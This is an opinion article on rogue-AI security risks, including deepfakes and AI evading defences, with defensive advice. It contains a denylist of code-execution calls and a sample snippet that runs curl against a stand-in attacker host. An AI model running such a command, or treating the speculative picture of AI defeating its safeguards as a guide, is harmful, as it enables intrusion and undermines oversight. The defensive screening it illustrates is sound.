Since we can all be prone to hyperbole, it could be easy to look at the discourse around AI — especially as ChatGPT rose to prominence in late 2022 and early 2023 — and think people are just overreacting when they say it’ll be the end of the world or of work as we know it. New technologies come around all the time, with similar proclamations made, and the world hasn’t ended yet.

But make no mistake: AI represents the possibility of a security threat that is powerful, broad-reaching and hard to stop. As AI advances, the possibility it could be misused or lead to consequences not intended by its creators or users also grows. There are few guardrails in place to keep AI in check; while federal legislation still hasn’t arrived, individual states are taking steps to address potential issues, though those are largely focused on specific use cases and not the broad impact of AI as a whole.

Just look at the way Bing’s AI threatened users or how generative models have been used to produce harmful code on a whim — the threat of AI “going rogue” is real, and the technology would be a formidable adversary were that to happen. AI is becoming more complex, especially as it learns from its own activity, and the potential for it to grow beyond our ability to rein it in is real as well.

What the threats will look like

AI systems could “go rogue” thanks to improper controls or a lack of oversight. Bad actors could tamper with their programming to hack another system, promote disinformation campaigns, or even take part in espionage. As AI tools proliferate, some could even be designed for the sole purpose of carrying out nefarious activities like cyberattacks.

Our ability to integrate AI with many other aspects of our lives — banking, social media, transportation, healthcare — is a mixed blessing, since the same technology that can empower us in each of these areas also, as a result, has access to and control over the critical systems that govern how we live.

AI’s incredible speed at sorting through data and making decisions would make it hard to keep up with in real time if we had to defend against a rogue system. It’s also flexible by nature, able to learn on the fly and adapt to new situations, even replicating itself at a scale that could attack multiple systems simultaneously. And it’s smart enough to first go after the defenses that might be used to stop it. What would normally be reserved for the realm of sci-fi or horror is quickly becoming a realistic possibility.

Complicating any would-be reactive measures is rogue AI’s ability to mimic normal human behavior, including replicating human voices with startling accuracy. The audio and visual “deepfakes” AI can generate so easily are another real threat, with serious implications for the everyday person, a business, or even entire countries: it’s not inconceivable that a deepfake of a politician supposedly saying something about another nation could spur an international political incident with deadly ramifications.

How developers and security teams can head off rogue AI

Given the severity of the threats rogue AI could pose, a proactive approach from all parties is a must — in some situations there is no easy fix, but prevention will go a long way.

Developers working on or with AI tools need to set clear guidelines for their entire organization — and their partners — on what constitutes ethical use of AI. They should hold all parties accountable for sticking to responsible development practices and implement the strongest security measures they can, since even the strongest policies leave room for mistakes, and a rogue individual may purposely flout them. Developers should also review their AI systems and practices frequently, assessing risks and making a plan to address any shortcomings.
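As one concrete, deliberately simple illustration of the kind of technical guardrail developers can layer on top of policy, the sketch below screens AI-generated Python snippets against a denylist of dangerous call patterns before allowing them anywhere near execution. The pattern list and names here are hypothetical examples, not a production-grade filter; a real deployment would pair a check like this with sandboxing and human review rather than rely on it alone.

```python
import re

# Hypothetical denylist of call patterns that AI-generated code should
# never contain without human review. This is illustrative only; real
# guardrails pair such checks with sandboxing and policy enforcement.
DANGEROUS_PATTERNS = [
    r"\bos\.system\b",
    r"\bsubprocess\b",
    r"\beval\s*\(",
    r"\bexec\s*\(",
    r"\b__import__\s*\(",
]

def screen_generated_code(code: str) -> list:
    """Return the denylisted patterns found in a generated snippet.

    An empty list means the snippet passed this (coarse) check; a
    non-empty list means it should be quarantined for human review.
    """
    return [p for p in DANGEROUS_PATTERNS if re.search(p, code)]

safe_snippet = "total = sum(range(10))\nprint(total)"
risky_snippet = "import subprocess; subprocess.run(['curl', 'attacker.example'])"
```

The design point is that the check runs before execution and fails closed: anything flagged is held for a person to look at, which is exactly the kind of accountability the guidelines above call for.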

Similarly, businesses themselves need to be assertive with their actions and policies around AI — an enterprise does not want to find itself on the back foot, with its everyday processes disrupted by rogue AI. Regular risk assessments and thorough contingency planning, should something go wrong, will keep businesses moving ahead. This should include investment in AI-specific security and risk management, which means training employees (not just those in the security department) to identify the signs of AI threats and building a thorough cybersecurity defense.
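AI-specific monitoring can start small. As a hedged illustration of one “sign of an AI threat” a defense might watch for, the sketch below flags a client whose request rate over a sliding window exceeds what a human operator could plausibly produce. The class name and the 30-requests-per-10-seconds threshold are assumptions for the example, not an industry standard.

```python
import time
from collections import deque
from typing import Optional

class RequestRateMonitor:
    """Flag clients whose request rate suggests automated, possibly
    AI-driven, activity.

    The default threshold (30 requests per 10-second window) is an
    illustrative assumption, not an industry standard.
    """

    def __init__(self, max_requests: int = 30, window_seconds: float = 10.0):
        self.max_requests = max_requests
        self.window = window_seconds
        self.timestamps = {}  # client_id -> deque of request times

    def record(self, client_id: str, now: Optional[float] = None) -> bool:
        """Record one request; return True if the client looks automated."""
        now = time.monotonic() if now is None else now
        q = self.timestamps.setdefault(client_id, deque())
        q.append(now)
        # Drop requests that have aged out of the sliding window.
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q) > self.max_requests
```

A flag from a monitor like this wouldn’t block anything on its own; it would feed the contingency process described above, giving trained employees something concrete to investigate.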

Like developers, all enterprises should have a clear outline for how AI may be used in the organization, if it is allowed at all. Establishing clear expectations and boundaries will help keep safety and ethical concerns at the forefront and lessen the risk of rogue AI as much as possible.

Staying ahead of AI

All technology evolves quickly, but none more rapidly than an AI system that learns as it goes along. It’s important that businesses and developers collaborate with others in the field and stay up to date on the latest threats and protective measures. Sharing knowledge and encouraging policymakers to enact reasonable, effective industry-wide standards for this technology can keep us all safe and limit the chances of a rogue AI doing real damage to our society.

While we’ve spent a lot of time on the threats of AI, it would be a mistake not to make clear that the possibility of a threatening rogue AI does not cancel out the incredible benefits that responsible AI can bring to enterprises and society as a whole. We simply need to take this moment to prepare ourselves and our companies, creating a culture of AI security and ethical use so that the technology can flourish in the right direction, bringing positive change and advancement for all.